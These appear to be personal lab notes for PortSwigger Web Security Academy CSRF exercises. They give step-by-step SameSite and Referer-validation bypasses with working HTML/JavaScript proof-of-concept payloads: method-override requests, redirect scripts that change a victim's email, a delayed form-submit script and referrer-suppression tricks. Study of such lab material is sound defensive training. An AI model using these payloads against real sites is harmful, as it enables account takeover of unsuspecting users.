---------------------Samesite Lax via method override -----------------------------------------
Step1)Navigate to the post request and then change it to get one 
      ---It must look like this when the request method is overidden !!!
      ---GET /my-account/change-email?email=scarofcupid@gmail.com&_method=POST HTTP/1.1
      ---&_method=POST == must for this method !!
 Step2)insert the following payload in CSRF Poc 
      --- <input type="hidden" name="_method" value="POST">
      ---IF the email/any-parameter doesn't change then use this thing inside script 
      ---<script>
           document.location = "https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email?email=pwned@web-security-academy.net&_method=POST";
        </script>
        

---------------------SameSite Strict bypass via client-side redirect ---------------------------
Step1)Search for redirection
      ---In this case /post/comment/confirmationid?6
      ---Modify the request such that it goes to the account page (eg: /my-account/changeemail?email=scarofcupid1@gmail.com where it receives csrf code)
Step2)Make a script like this where it receives redirection 
       <script>
           document.location = "https://YOUR-LAB-ID.web-security-academy.net/post/comment/confirmation?postId=../my-account";
       </script>


--------------------SameSite Lax bypass via cookie refresh------------------------------------
Step1)Generate Poc with the help of Burp-suite extension
step2)Use this script
     <script>
        window.onclick = () => 
{
        window.open('URL');
        setTimeout(changeemail,5000);
}
function changeemail()
{
document.form[0].submit();
}
     </script>
Step3)Check for email change


---------------------CSRF where Referer validation depends on header being present----------------------------------------
Step1)Generate CSRF poc
Step2)Insert  the following header after <head> 
     ----<meta name="referrer" content="no-referrer">

---------------------CSRF with broker refer validation----------------------------------------
Step1)In the request section, add one header : Referrer:https:hacked.com/?Website-domain-that-is-correct or any value that it accepts
Step2)Generate Poc
Step3)Add this portion:<script>    history.pushState("", "", "/?YOUR-LAB-ID.web-security-academy.net")       </script>



